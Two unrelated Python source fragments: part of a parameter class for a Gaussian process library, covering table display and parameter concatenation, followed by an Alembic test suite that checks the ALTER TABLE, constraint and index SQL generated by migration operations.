indices = np.indices(self._realshape_, dtype=int)
indices = indices[(slice(None),)+slice_index]
indices = np.rollaxis(indices, 0, indices.ndim)
return indices
def _max_len_names(self, gen, header):
gen = map(lambda x: " ".join(map(str, x)), gen)
return reduce(lambda a, b:max(a, len(b)), gen, len(header))
def _max_len_values(self):
return reduce(lambda a, b:max(a, len("{x:=.{0}g}".format(__precision__, x=b))), self.flat, len(self.hierarchy_name()))
def _max_len_index(self, ind):
return reduce(lambda a, b:max(a, len(str(b))), ind, len(__index_name__))
def _short(self):
# short string to print
name = self.hierarchy_name()
if self._realsize_ < 2:
return name
ind = self._indices()
if ind.size > 4: indstr = ','.join(map(str, ind[:2])) + "..." + ','.join(map(str, ind[-2:]))
else: indstr = ','.join(map(str, ind))
return name + '[' + indstr + ']'
def _repr_html_(self, constr_matrix=None, indices=None, prirs=None, ties=None):
"""Representation of the parameter in html for notebook display."""
filter_ = self._current_slice_
vals = self.flat
if indices is None: indices = self._indices(filter_)
ravi = self._raveled_index(filter_)
if constr_matrix is None: constr_matrix = self.constraints.properties_for(ravi)
if prirs is None: prirs = self.priors.properties_for(ravi)
if ties is None: ties = self._ties_for(ravi)
ties = [' '.join(map(lambda x: x, t)) for t in ties]
header_format = """
<tr>
<th><b>{i}</b></th>
<th><b>{x}</b></th>
<th><b>{c}</b></th>
<th><b>{p}</b></th>
<th><b>{t}</b></th>
</tr>"""
header = header_format.format(x=self.hierarchy_name(), c=__constraints_name__, i=__index_name__, t=__tie_name__, p=__priors_name__) # nice header for printing
if not ties: ties = itertools.cycle([''])
return "\n".join(["""<style type="text/css">
.tg {border-collapse:collapse;border-spacing:0;border-color:#999;}
.tg td{font-family:Arial, sans-serif;font-size:14px;padding:2px 3px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:#999;color:#444;background-color:#F7FDFA;}
.tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:2px 3px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:#999;color:#fff;background-color:#26ADE4;}
.tg .tg-left{font-family:"Courier New", Courier, monospace !important;;text-align:left}
.tg .tg-right{font-family:"Courier New", Courier, monospace !important;;text-align:right}
</style>"""] + ['<table class="tg">'] + [header] + ["<tr><td class=tg-left>{i}</td><td class=tg-right>{x}</td><td class=tg-left>{c}</td><td class=tg-left>{p}</td><td class=tg-left>{t}</td></tr>".format(x=x, c=" ".join(map(str, c)), p=" ".join(map(str, p)), t=(t or ''), i=i) for i, x, c, t, p in itertools.izip(indices, vals, constr_matrix, ties, prirs)] + ["</table>"])
def __str__(self, constr_matrix=None, indices=None, prirs=None, ties=None, lc=None, lx=None, li=None, lp=None, lt=None, only_name=False):
filter_ = self._current_slice_
vals = self.flat
if indices is None: indices = self._indices(filter_)
ravi = self._raveled_index(filter_)
if constr_matrix is None: constr_matrix = self.constraints.properties_for(ravi)
if prirs is None: prirs = self.priors.properties_for(ravi)
if ties is None: ties = self._ties_for(ravi)
ties = [' '.join(map(lambda x: x, t)) for t in ties]
if lc is None: lc = self._max_len_names(constr_matrix, __constraints_name__)
if lx is None: lx = self._max_len_values()
if li is None: li = self._max_len_index(indices)
if lt is None: lt = self._max_len_names(ties, __tie_name__)
if lp is None: lp = self._max_len_names(prirs, __tie_name__)
sep = '-'
header_format = " {i:{5}^{2}s} | \033[1m{x:{5}^{1}s}\033[0;0m | {c:{5}^{0}s} | {p:{5}^{4}s} | {t:{5}^{3}s}"
if only_name: header = header_format.format(lc, lx, li, lt, lp, ' ', x=self.hierarchy_name(), c=sep*lc, i=sep*li, t=sep*lt, p=sep*lp) # nice header for printing
else: header = header_format.format(lc, lx, li, lt, lp, ' ', x=self.hierarchy_name(), c=__constraints_name__, i=__index_name__, t=__tie_name__, p=__priors_name__) # nice header for printing
if not ties: ties = itertools.cycle([''])
return "\n".join([header] + [" {i!s:^{3}s} | {x: >{1}.{2}g} | {c:^{0}s} | {p:^{5}s} | {t:^{4}s} ".format(lc, lx, __precision__, li, lt, lp, x=x, c=" ".join(map(str, c)), p=" ".join(map(str, p)), t=(t or ''), i=i) for i, x, c, t, p in itertools.izip(indices, vals, constr_matrix, ties, prirs)]) # return all the constraints with right indices
# except: return super(Param, self).__str__()
class ParamConcatenation(object):
def __init__(self, params):
"""
Parameter concatenation for convenience of printing regular expression matched arrays
you can index this concatenation as if it was the flattened concatenation
of all the parameters it contains, same for setting parameters (Broadcasting enabled).
See :py:class:`GPy.core.parameter.Param` for more details on constraining.
"""
# self.params = params
from lists_and_dicts import ArrayList
self.params = ArrayList([])
for p in params:
for p in p.flattened_parameters:
if p not in self.params:
self.params.append(p)
self._param_sizes = [p.size for p in self.params]
startstops = numpy.cumsum([0] + self._param_sizes)
self._param_slices_ = [slice(start, stop) for start,stop in zip(startstops, startstops[1:])]
parents = dict()
for p in self.params:
if p.has_parent():
parent = p._parent_
level = 0
while parent is not None:
if parent in parents:
parents[parent] = max(level, parents[parent])
else:
parents[parent] = level
level += 1
parent = parent._parent_
import operator
self.parents = map(lambda x: x[0], sorted(parents.iteritems(), key=operator.itemgetter(1)))
#===========================================================================
# Get/set items, enable broadcasting
#===========================================================================
def __getitem__(self, s):
ind = numpy.zeros(sum(self._param_sizes), dtype=bool); ind[s] = True;
params = [p.param_array.flat[ind[ps]] for p,ps in zip(self.params, self._param_slices_) if numpy.any(p.param_array.flat[ind[ps]])]
if len(params)==1: return params[0]
return ParamConcatenation(params)
def __setitem__(self, s, val, update=True):
if isinstance(val, ParamConcatenation):
val = val.values()
ind = numpy.zeros(sum(self._param_sizes), dtype=bool); ind[s] = True;
vals = self.values(); vals[s] = val
for p, ps in zip(self.params, self._param_slices_):
p.flat[ind[ps]] = vals[ps]
if update:
self.update_all_params()
def values(self):
return numpy.hstack([p.param_array.flat for p in self.params])
#===========================================================================
# parameter operations:
#===========================================================================
def update_all_params(self):
for par in self.parents:
par.notify_observers()
def constrain(self, constraint, warning=True):
[param.constrain(constraint, trigger_parent=False) for param in self.params]
self.update_all_params()
constrain.__doc__ = Param.constrain.__doc__
def constrain_positive(self, warning=True):
[param.constrain_positive(warning, trigger_parent=False) for param in self.params]
self.update_all_params()
constrain_positive.__doc__ = Param.constrain_positive.__doc__
def constrain_fixed(self, value=None, warning=True, trigger_parent=True):
[param.constrain_fixed(value, warning, trigger_parent) for param in self.params]
constrain_fixed.__doc__ = Param.constrain_fixed.__doc__
fix = constrain_fixed
def constrain_negative(self, warning=True):
[param.constrain_negative(warning, trigger_parent=False) for param in self.params]
self.update_all_params()
constrain_negative.__doc__ = Param.constrain_negative.__doc__
def constrain_bounded(self, lower, upper, warning=True):
[param.constrain_bounded(lower, upper, warning, trigger_parent=False) for param in self.params]
self.update_all_params()
constrain_bounded.__doc__ = Param.constrain_bounded.__doc__
def unconstrain(self, *constraints):
[param.unconstrain(*constraints) for param in self.params]
unconstrain.__doc__ = Param.unconstrain.__doc__
def unconstrain_negative(self):
[param.unconstrain_negative() for param in self.params]
unconstrain_negative.__doc__ = Param.unconstrain_negative.__doc__
def unconstrain_positive(self):
[param.unconstrain_positive() for param in self.params]
unconstrain_positive.__doc__ = Param.unconstrain_positive.__doc__
def unconstrain_fixed(self):
[param.unconstrain_fixed() for param in self.params]
unconstrain_fixed.__doc__ = Param.unconstrain_fixed.__doc__
unfix = unconstrain_fixed
def unconstrain_bounded(self, lower, upper):
[param.unconstrain_bounded(lower, upper) for param in self.params]
unconstrain_bounded.__doc__ = Param.unconstrain_bounded.__doc__
def untie(self, *ties):
[param.untie(*ties) for param in self.params]
def checkgrad(self, verbose=0, step=1e-6, tolerance=1e-3):
return self.params[0]._highest_parent_._checkgrad(self, verbose, step, tolerance)
#checkgrad.__doc__ = Gradcheckable.checkgrad.__doc__
__lt__ = lambda self, val: self.values() < val
__le__ = lambda self, val: self.values() <= val
__eq__ = lambda self, val: self.values() == val
__ne__ = lambda self, val: self.values() != val
__gt__ = lambda self, val: self.values() > val
__ge__ = lambda self, val: self.values() >= val
def __str__(self, *args, **kwargs):
def f(p):
ind = p._raveled_index()
return p.constraints.properties_for(ind), p._ties_for(ind), p.priors.properties_for(ind)
params = self.params
constr_matrices, ties_matrices, prior_matrices = zip(*map(f, params))
indices = [p._indices() for p in params]
lc = max([p._max_len_names(cm, __constraints_name__) for p, cm in itertools.izip(params, constr_matrices)])
lx = max([p._max_len_values() for p in params])
li = max([p._max_len_index(i) for p, i in itertools.izip(params, indices)])
lt = max([p._max_len_names(tm, __tie_name__) for p, tm in itertools.izip(params, ties_matrices)])
lp = max([p._max_len_names(pm, __constraints_name__) for p, pm in itertools.izip(params, prior_matrices)])
strings = []
start = True
for p, cm, i, tm, pm in itertools.izip(params,constr_matrices,indices,ties_matrices,prior_matrices):
strings.append(p.__str__(constr_matrix=cm, indices=i, prirs=pm, ties=tm, lc=lc, lx=lx, li=li, lp=lp, lt=lt, only_name=(1-start)))
start = False
return "\n".join(strings)
def __repr__(self):
return "\n".join(map(repr,self.params))
def __ilshift__(self, *args, **kwargs):
self[:] = np.ndarray.__ilshift__(self.values(), *args, **kwargs)
def __irshift__(self, *args, **kwargs):
self[:] = np.ndarray.__irshift__(self.values(), *args, **kwargs)
def __ixor__(self, *args, **kwargs):
self[:] = np.ndarray.__ixor__(self.values(), *args, **kwargs)
def __ipow__(self, *args, **kwargs):
self[:] = np.ndarray.__ipow__(self.values(), *args, **kwargs)
def __ifloordiv__(self, *args, **kwargs):
self[:] = np.ndarray.__ifloordiv__(self.values(), *args, **kwargs)
def __isub__(self, *args, **kwargs):
self[:] = np.ndarray.__isub__(self.values(), *args, **kwargs)
def __ior__(self, *args, **kwargs):
self[:] = np.ndarray.__ior__(self.values(), *args, **kwargs)
def __itruediv__(self, *args, **kwargs):
self[:] = np.ndarray.__itruediv__(self.values(), *args, **kwargs)
def __idiv__(self, *args, **kwargs):
self[:] = np.ndarray.__idiv__(self.values(), *args, **kwargs)
def __iand__(self, *args, **kwargs):
self[:] = np.ndarray.__iand__(self.values(), *args, **kwargs)
def __imod__(self, *args, **kwargs):
self[:] = np.ndarray.__imod__(self.values(), *args, **kwargs)
def __iadd__(self, *args, **kwargs):
self[:] = np.ndarray.__iadd__(self.values(), *args, **kwargs)
def __imul__(self, *args, **kwargs):
self[:] = np.ndarray.__imul__(self.values(), *args, **kwargs)
|
|
"""Test against the builders in the op.* module."""
from sqlalchemy import Integer, Column, ForeignKey, \
Table, String, Boolean
from sqlalchemy.sql import column, func, text
from sqlalchemy import event
from alembic import op
from alembic.testing.fixtures import op_fixture
from alembic.testing import eq_, assert_raises_message, is_
from alembic.testing import mock
from alembic.testing.fixtures import TestBase
from alembic.testing import config
from alembic.operations import schemaobj, ops
@event.listens_for(Table, "after_parent_attach")
def _add_cols(table, metadata):
if table.name == "tbl_with_auto_appended_column":
table.append_column(Column('bat', Integer))
class OpTest(TestBase):
def test_rename_table(self):
context = op_fixture()
op.rename_table('t1', 't2')
context.assert_("ALTER TABLE t1 RENAME TO t2")
def test_rename_table_schema(self):
context = op_fixture()
op.rename_table('t1', 't2', schema="foo")
context.assert_("ALTER TABLE foo.t1 RENAME TO foo.t2")
def test_rename_table_postgresql(self):
context = op_fixture("postgresql")
op.rename_table('t1', 't2')
context.assert_("ALTER TABLE t1 RENAME TO t2")
def test_rename_table_schema_postgresql(self):
context = op_fixture("postgresql")
op.rename_table('t1', 't2', schema="foo")
context.assert_("ALTER TABLE foo.t1 RENAME TO t2")
def test_create_index_no_expr_allowed(self):
op_fixture()
assert_raises_message(
ValueError,
"String or text\(\) construct expected",
op.create_index, 'name', 'tname', [func.foo(column('x'))]
)
@config.requirements.sqlalchemy_09
def test_add_column_schema_hard_quoting(self):
from sqlalchemy.sql.schema import quoted_name
context = op_fixture("postgresql")
op.add_column(
"somename", Column("colname", String),
schema=quoted_name("some.schema", quote=True))
context.assert_(
'ALTER TABLE "some.schema".somename ADD COLUMN colname VARCHAR'
)
@config.requirements.sqlalchemy_09
def test_rename_table_schema_hard_quoting(self):
from sqlalchemy.sql.schema import quoted_name
context = op_fixture("postgresql")
op.rename_table(
't1', 't2',
schema=quoted_name("some.schema", quote=True))
context.assert_(
'ALTER TABLE "some.schema".t1 RENAME TO t2'
)
@config.requirements.sqlalchemy_09
def test_add_constraint_schema_hard_quoting(self):
from sqlalchemy.sql.schema import quoted_name
context = op_fixture("postgresql")
op.create_check_constraint(
"ck_user_name_len",
"user_table",
func.len(column('name')) > 5,
schema=quoted_name("some.schema", quote=True)
)
context.assert_(
'ALTER TABLE "some.schema".user_table ADD '
'CONSTRAINT ck_user_name_len CHECK (len(name) > 5)'
)
def test_create_index_quoting(self):
context = op_fixture("postgresql")
op.create_index(
'geocoded',
'locations',
["IShouldBeQuoted"])
context.assert_(
'CREATE INDEX geocoded ON locations ("IShouldBeQuoted")')
@config.requirements.fail_before_sqla_080
def test_create_index_expressions(self):
context = op_fixture()
op.create_index(
'geocoded',
'locations',
[text('lower(coordinates)')])
context.assert_(
"CREATE INDEX geocoded ON locations (lower(coordinates))")
@config.requirements.fail_before_sqla_080
def test_create_index_postgresql_expressions(self):
context = op_fixture("postgresql")
op.create_index(
'geocoded',
'locations',
[text('lower(coordinates)')],
postgresql_where=text("locations.coordinates != Null"))
context.assert_(
"CREATE INDEX geocoded ON locations (lower(coordinates)) "
"WHERE locations.coordinates != Null")
def test_create_index_postgresql_where(self):
context = op_fixture("postgresql")
op.create_index(
'geocoded',
'locations',
['coordinates'],
postgresql_where=text("locations.coordinates != Null"))
context.assert_(
"CREATE INDEX geocoded ON locations (coordinates) "
"WHERE locations.coordinates != Null")
def test_add_column(self):
context = op_fixture()
op.add_column('t1', Column('c1', Integer, nullable=False))
context.assert_("ALTER TABLE t1 ADD COLUMN c1 INTEGER NOT NULL")
def test_add_column_schema(self):
context = op_fixture()
op.add_column('t1', Column('c1', Integer, nullable=False), schema="foo")
context.assert_("ALTER TABLE foo.t1 ADD COLUMN c1 INTEGER NOT NULL")
def test_add_column_with_default(self):
context = op_fixture()
op.add_column(
't1', Column('c1', Integer, nullable=False, server_default="12"))
context.assert_(
"ALTER TABLE t1 ADD COLUMN c1 INTEGER DEFAULT '12' NOT NULL")
def test_add_column_with_index(self):
context = op_fixture()
op.add_column(
't1', Column('c1', Integer, nullable=False, index=True))
context.assert_(
"ALTER TABLE t1 ADD COLUMN c1 INTEGER NOT NULL",
"CREATE INDEX ix_t1_c1 ON t1 (c1)",
)
def test_add_column_schema_with_default(self):
context = op_fixture()
op.add_column('t1',
Column('c1', Integer, nullable=False, server_default="12"),
schema='foo')
context.assert_(
"ALTER TABLE foo.t1 ADD COLUMN c1 INTEGER DEFAULT '12' NOT NULL")
def test_add_column_fk(self):
context = op_fixture()
op.add_column(
't1', Column('c1', Integer, ForeignKey('c2.id'), nullable=False))
context.assert_(
"ALTER TABLE t1 ADD COLUMN c1 INTEGER NOT NULL",
"ALTER TABLE t1 ADD FOREIGN KEY(c1) REFERENCES c2 (id)"
)
def test_add_column_schema_fk(self):
context = op_fixture()
op.add_column('t1',
Column('c1', Integer, ForeignKey('c2.id'), nullable=False),
schema='foo')
context.assert_(
"ALTER TABLE foo.t1 ADD COLUMN c1 INTEGER NOT NULL",
"ALTER TABLE foo.t1 ADD FOREIGN KEY(c1) REFERENCES c2 (id)"
)
def test_add_column_schema_type(self):
"""Test that a schema type generates its constraints...."""
context = op_fixture()
op.add_column('t1', Column('c1', Boolean, nullable=False))
context.assert_(
'ALTER TABLE t1 ADD COLUMN c1 BOOLEAN NOT NULL',
'ALTER TABLE t1 ADD CHECK (c1 IN (0, 1))'
)
def test_add_column_schema_schema_type(self):
"""Test that a schema type generates its constraints...."""
context = op_fixture()
op.add_column('t1', Column('c1', Boolean, nullable=False), schema='foo')
context.assert_(
'ALTER TABLE foo.t1 ADD COLUMN c1 BOOLEAN NOT NULL',
'ALTER TABLE foo.t1 ADD CHECK (c1 IN (0, 1))'
)
def test_add_column_schema_type_checks_rule(self):
"""Test that a schema type doesn't generate a
constraint based on check rule."""
context = op_fixture('postgresql')
op.add_column('t1', Column('c1', Boolean, nullable=False))
context.assert_(
'ALTER TABLE t1 ADD COLUMN c1 BOOLEAN NOT NULL',
)
def test_add_column_fk_self_referential(self):
context = op_fixture()
op.add_column(
't1', Column('c1', Integer, ForeignKey('t1.c2'), nullable=False))
context.assert_(
"ALTER TABLE t1 ADD COLUMN c1 INTEGER NOT NULL",
"ALTER TABLE t1 ADD FOREIGN KEY(c1) REFERENCES t1 (c2)"
)
def test_add_column_schema_fk_self_referential(self):
context = op_fixture()
op.add_column(
't1',
Column('c1', Integer, ForeignKey('foo.t1.c2'), nullable=False),
schema='foo')
context.assert_(
"ALTER TABLE foo.t1 ADD COLUMN c1 INTEGER NOT NULL",
"ALTER TABLE foo.t1 ADD FOREIGN KEY(c1) REFERENCES foo.t1 (c2)"
)
def test_add_column_fk_schema(self):
context = op_fixture()
op.add_column(
't1',
Column('c1', Integer, ForeignKey('remote.t2.c2'), nullable=False))
context.assert_(
'ALTER TABLE t1 ADD COLUMN c1 INTEGER NOT NULL',
'ALTER TABLE t1 ADD FOREIGN KEY(c1) REFERENCES remote.t2 (c2)'
)
def test_add_column_schema_fk_schema(self):
context = op_fixture()
op.add_column(
't1',
Column('c1', Integer, ForeignKey('remote.t2.c2'), nullable=False),
schema='foo')
context.assert_(
'ALTER TABLE foo.t1 ADD COLUMN c1 INTEGER NOT NULL',
'ALTER TABLE foo.t1 ADD FOREIGN KEY(c1) REFERENCES remote.t2 (c2)'
)
def test_drop_column(self):
context = op_fixture()
op.drop_column('t1', 'c1')
context.assert_("ALTER TABLE t1 DROP COLUMN c1")
def test_drop_column_schema(self):
context = op_fixture()
op.drop_column('t1', 'c1', schema='foo')
context.assert_("ALTER TABLE foo.t1 DROP COLUMN c1")
def test_alter_column_nullable(self):
context = op_fixture()
op.alter_column("t", "c", nullable=True)
context.assert_(
# TODO: not sure if this is PG only or standard
# SQL
"ALTER TABLE t ALTER COLUMN c DROP NOT NULL"
)
def test_alter_column_schema_nullable(self):
context = op_fixture()
op.alter_column("t", "c", nullable=True, schema='foo')
context.assert_(
# TODO: not sure if this is PG only or standard
# SQL
"ALTER TABLE foo.t ALTER COLUMN c DROP NOT NULL"
)
def test_alter_column_not_nullable(self):
context = op_fixture()
op.alter_column("t", "c", nullable=False)
context.assert_(
# TODO: not sure if this is PG only or standard
# SQL
"ALTER TABLE t ALTER COLUMN c SET NOT NULL"
)
def test_alter_column_schema_not_nullable(self):
context = op_fixture()
op.alter_column("t", "c", nullable=False, schema='foo')
context.assert_(
# TODO: not sure if this is PG only or standard
# SQL
"ALTER TABLE foo.t ALTER COLUMN c SET NOT NULL"
)
def test_alter_column_rename(self):
context = op_fixture()
op.alter_column("t", "c", new_column_name="x")
context.assert_(
"ALTER TABLE t RENAME c TO x"
)
def test_alter_column_schema_rename(self):
context = op_fixture()
op.alter_column("t", "c", new_column_name="x", schema='foo')
context.assert_(
"ALTER TABLE foo.t RENAME c TO x"
)
def test_alter_column_type(self):
context = op_fixture()
op.alter_column("t", "c", type_=String(50))
context.assert_(
'ALTER TABLE t ALTER COLUMN c TYPE VARCHAR(50)'
)
def test_alter_column_schema_type(self):
context = op_fixture()
op.alter_column("t", "c", type_=String(50), schema='foo')
context.assert_(
'ALTER TABLE foo.t ALTER COLUMN c TYPE VARCHAR(50)'
)
def test_alter_column_set_default(self):
context = op_fixture()
op.alter_column("t", "c", server_default="q")
context.assert_(
"ALTER TABLE t ALTER COLUMN c SET DEFAULT 'q'"
)
def test_alter_column_schema_set_default(self):
context = op_fixture()
op.alter_column("t", "c", server_default="q", schema='foo')
context.assert_(
"ALTER TABLE foo.t ALTER COLUMN c SET DEFAULT 'q'"
)
def test_alter_column_set_compiled_default(self):
context = op_fixture()
op.alter_column("t", "c",
server_default=func.utc_thing(func.current_timestamp()))
context.assert_(
"ALTER TABLE t ALTER COLUMN c SET DEFAULT utc_thing(CURRENT_TIMESTAMP)"
)
def test_alter_column_schema_set_compiled_default(self):
context = op_fixture()
op.alter_column("t", "c",
server_default=func.utc_thing(func.current_timestamp()),
schema='foo')
context.assert_(
"ALTER TABLE foo.t ALTER COLUMN c "
"SET DEFAULT utc_thing(CURRENT_TIMESTAMP)"
)
def test_alter_column_drop_default(self):
context = op_fixture()
op.alter_column("t", "c", server_default=None)
context.assert_(
'ALTER TABLE t ALTER COLUMN c DROP DEFAULT'
)
def test_alter_column_schema_drop_default(self):
context = op_fixture()
op.alter_column("t", "c", server_default=None, schema='foo')
context.assert_(
'ALTER TABLE foo.t ALTER COLUMN c DROP DEFAULT'
)
def test_alter_column_schema_type_unnamed(self):
context = op_fixture('mssql')
op.alter_column("t", "c", type_=Boolean())
context.assert_(
'ALTER TABLE t ALTER COLUMN c BIT',
'ALTER TABLE t ADD CHECK (c IN (0, 1))'
)
def test_alter_column_schema_schema_type_unnamed(self):
context = op_fixture('mssql')
op.alter_column("t", "c", type_=Boolean(), schema='foo')
context.assert_(
'ALTER TABLE foo.t ALTER COLUMN c BIT',
'ALTER TABLE foo.t ADD CHECK (c IN (0, 1))'
)
def test_alter_column_schema_type_named(self):
context = op_fixture('mssql')
op.alter_column("t", "c", type_=Boolean(name="xyz"))
context.assert_(
'ALTER TABLE t ALTER COLUMN c BIT',
'ALTER TABLE t ADD CONSTRAINT xyz CHECK (c IN (0, 1))'
)
def test_alter_column_schema_schema_type_named(self):
context = op_fixture('mssql')
op.alter_column("t", "c", type_=Boolean(name="xyz"), schema='foo')
context.assert_(
'ALTER TABLE foo.t ALTER COLUMN c BIT',
'ALTER TABLE foo.t ADD CONSTRAINT xyz CHECK (c IN (0, 1))'
)
def test_alter_column_schema_type_existing_type(self):
context = op_fixture('mssql')
op.alter_column(
"t", "c", type_=String(10), existing_type=Boolean(name="xyz"))
context.assert_(
'ALTER TABLE t DROP CONSTRAINT xyz',
'ALTER TABLE t ALTER COLUMN c VARCHAR(10)'
)
def test_alter_column_schema_schema_type_existing_type(self):
context = op_fixture('mssql')
op.alter_column("t", "c", type_=String(10),
existing_type=Boolean(name="xyz"), schema='foo')
context.assert_(
'ALTER TABLE foo.t DROP CONSTRAINT xyz',
'ALTER TABLE foo.t ALTER COLUMN c VARCHAR(10)'
)
def test_alter_column_schema_type_existing_type_no_const(self):
context = op_fixture('postgresql')
op.alter_column("t", "c", type_=String(10), existing_type=Boolean())
context.assert_(
'ALTER TABLE t ALTER COLUMN c TYPE VARCHAR(10)'
)
def test_alter_column_schema_schema_type_existing_type_no_const(self):
context = op_fixture('postgresql')
op.alter_column("t", "c", type_=String(10), existing_type=Boolean(),
schema='foo')
context.assert_(
'ALTER TABLE foo.t ALTER COLUMN c TYPE VARCHAR(10)'
)
def test_alter_column_schema_type_existing_type_no_new_type(self):
context = op_fixture('postgresql')
op.alter_column("t", "c", nullable=False, existing_type=Boolean())
context.assert_(
'ALTER TABLE t ALTER COLUMN c SET NOT NULL'
)
def test_alter_column_schema_schema_type_existing_type_no_new_type(self):
context = op_fixture('postgresql')
op.alter_column("t", "c", nullable=False, existing_type=Boolean(),
schema='foo')
context.assert_(
'ALTER TABLE foo.t ALTER COLUMN c SET NOT NULL'
)
def test_add_foreign_key(self):
context = op_fixture()
op.create_foreign_key('fk_test', 't1', 't2',
['foo', 'bar'], ['bat', 'hoho'])
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT fk_test FOREIGN KEY(foo, bar) "
"REFERENCES t2 (bat, hoho)"
)
def test_add_foreign_key_schema(self):
context = op_fixture()
op.create_foreign_key('fk_test', 't1', 't2',
['foo', 'bar'], ['bat', 'hoho'],
source_schema='foo2', referent_schema='bar2')
context.assert_(
"ALTER TABLE foo2.t1 ADD CONSTRAINT fk_test FOREIGN KEY(foo, bar) "
"REFERENCES bar2.t2 (bat, hoho)"
)
def test_add_foreign_key_onupdate(self):
context = op_fixture()
op.create_foreign_key('fk_test', 't1', 't2',
['foo', 'bar'], ['bat', 'hoho'],
onupdate='CASCADE')
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT fk_test FOREIGN KEY(foo, bar) "
"REFERENCES t2 (bat, hoho) ON UPDATE CASCADE"
)
def test_add_foreign_key_ondelete(self):
context = op_fixture()
op.create_foreign_key('fk_test', 't1', 't2',
['foo', 'bar'], ['bat', 'hoho'],
ondelete='CASCADE')
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT fk_test FOREIGN KEY(foo, bar) "
"REFERENCES t2 (bat, hoho) ON DELETE CASCADE"
)
def test_add_foreign_key_deferrable(self):
context = op_fixture()
op.create_foreign_key('fk_test', 't1', 't2',
['foo', 'bar'], ['bat', 'hoho'],
deferrable=True)
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT fk_test FOREIGN KEY(foo, bar) "
"REFERENCES t2 (bat, hoho) DEFERRABLE"
)
def test_add_foreign_key_initially(self):
context = op_fixture()
op.create_foreign_key('fk_test', 't1', 't2',
['foo', 'bar'], ['bat', 'hoho'],
initially='INITIAL')
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT fk_test FOREIGN KEY(foo, bar) "
"REFERENCES t2 (bat, hoho) INITIALLY INITIAL"
)
@config.requirements.foreign_key_match
def test_add_foreign_key_match(self):
context = op_fixture()
op.create_foreign_key('fk_test', 't1', 't2',
['foo', 'bar'], ['bat', 'hoho'],
match='SIMPLE')
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT fk_test FOREIGN KEY(foo, bar) "
"REFERENCES t2 (bat, hoho) MATCH SIMPLE"
)
def test_add_foreign_key_dialect_kw(self):
op_fixture()
with mock.patch(
"sqlalchemy.schema.ForeignKeyConstraint"
) as fkc:
op.create_foreign_key('fk_test', 't1', 't2',
['foo', 'bar'], ['bat', 'hoho'],
foobar_arg='xyz')
if config.requirements.foreign_key_match.enabled:
eq_(fkc.mock_calls[0],
mock.call(['foo', 'bar'], ['t2.bat', 't2.hoho'],
onupdate=None, ondelete=None, name='fk_test',
foobar_arg='xyz',
deferrable=None, initially=None, match=None))
else:
eq_(fkc.mock_calls[0],
mock.call(['foo', 'bar'], ['t2.bat', 't2.hoho'],
onupdate=None, ondelete=None, name='fk_test',
foobar_arg='xyz',
deferrable=None, initially=None))
def test_add_foreign_key_self_referential(self):
context = op_fixture()
op.create_foreign_key("fk_test", "t1", "t1", ["foo"], ["bar"])
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT fk_test "
"FOREIGN KEY(foo) REFERENCES t1 (bar)"
)
def test_add_primary_key_constraint(self):
context = op_fixture()
op.create_primary_key("pk_test", "t1", ["foo", "bar"])
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT pk_test PRIMARY KEY (foo, bar)"
)
def test_add_primary_key_constraint_schema(self):
context = op_fixture()
op.create_primary_key("pk_test", "t1", ["foo"], schema="bar")
context.assert_(
"ALTER TABLE bar.t1 ADD CONSTRAINT pk_test PRIMARY KEY (foo)"
)
def test_add_check_constraint(self):
context = op_fixture()
op.create_check_constraint(
"ck_user_name_len",
"user_table",
func.len(column('name')) > 5
)
context.assert_(
"ALTER TABLE user_table ADD CONSTRAINT ck_user_name_len "
"CHECK (len(name) > 5)"
)
def test_add_check_constraint_schema(self):
context = op_fixture()
op.create_check_constraint(
"ck_user_name_len",
"user_table",
func.len(column('name')) > 5,
schema='foo'
)
context.assert_(
"ALTER TABLE foo.user_table ADD CONSTRAINT ck_user_name_len "
"CHECK (len(name) > 5)"
)
def test_add_unique_constraint(self):
context = op_fixture()
op.create_unique_constraint('uk_test', 't1', ['foo', 'bar'])
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT uk_test UNIQUE (foo, bar)"
)
def test_add_foreign_key_legacy_kwarg(self):
context = op_fixture()
op.create_foreign_key(
name='some_fk',
source='some_table',
referent='referred_table',
local_cols=['a', 'b'],
remote_cols=['c', 'd'],
ondelete='CASCADE'
)
context.assert_(
"ALTER TABLE some_table ADD CONSTRAINT some_fk "
"FOREIGN KEY(a, b) REFERENCES referred_table (c, d) "
"ON DELETE CASCADE"
)
def test_add_unique_constraint_legacy_kwarg(self):
context = op_fixture()
op.create_unique_constraint(
name='uk_test',
source='t1',
local_cols=['foo', 'bar'])
context.assert_(
"ALTER TABLE t1 ADD CONSTRAINT uk_test UNIQUE (foo, bar)"
)
def test_drop_constraint_legacy_kwarg(self):
context = op_fixture()
op.drop_constraint(name='pk_name',
table_name='sometable',
type_='primary')
context.assert_(
"ALTER TABLE sometable DROP CONSTRAINT pk_name"
)
def test_create_pk_legacy_kwarg(self):
context = op_fixture()
op.create_primary_key(name=None,
table_name='sometable',
cols=['router_id', 'l3_agent_id'])
context.assert_(
"ALTER TABLE sometable ADD PRIMARY KEY (router_id, l3_agent_id)"
)
def test_legacy_kwarg_catches_arg_missing(self):
op_fixture()
assert_raises_message(
TypeError,
"missing required positional argument: columns",
op.create_primary_key,
name=None,
table_name='sometable',
wrong_cols=['router_id', 'l3_agent_id']
)
def test_add_unique_constraint_schema(self):
context = op_fixture()
op.create_unique_constraint(
'uk_test', 't1', ['foo', 'bar'], schema='foo')
context.assert_(
"ALTER TABLE foo.t1 ADD CONSTRAINT uk_test UNIQUE (foo, bar)"
)
def test_drop_constraint(self):
context = op_fixture()
op.drop_constraint('foo_bar_bat', 't1')
context.assert_(
"ALTER TABLE t1 DROP CONSTRAINT foo_bar_bat"
)
def test_drop_constraint_schema(self):
context = op_fixture()
op.drop_constraint('foo_bar_bat', 't1', schema='foo')
context.assert_(
"ALTER TABLE foo.t1 DROP CONSTRAINT foo_bar_bat"
)
def test_create_index(self):
context = op_fixture()
op.create_index('ik_test', 't1', ['foo', 'bar'])
context.assert_(
"CREATE INDEX ik_test ON t1 (foo, bar)"
)
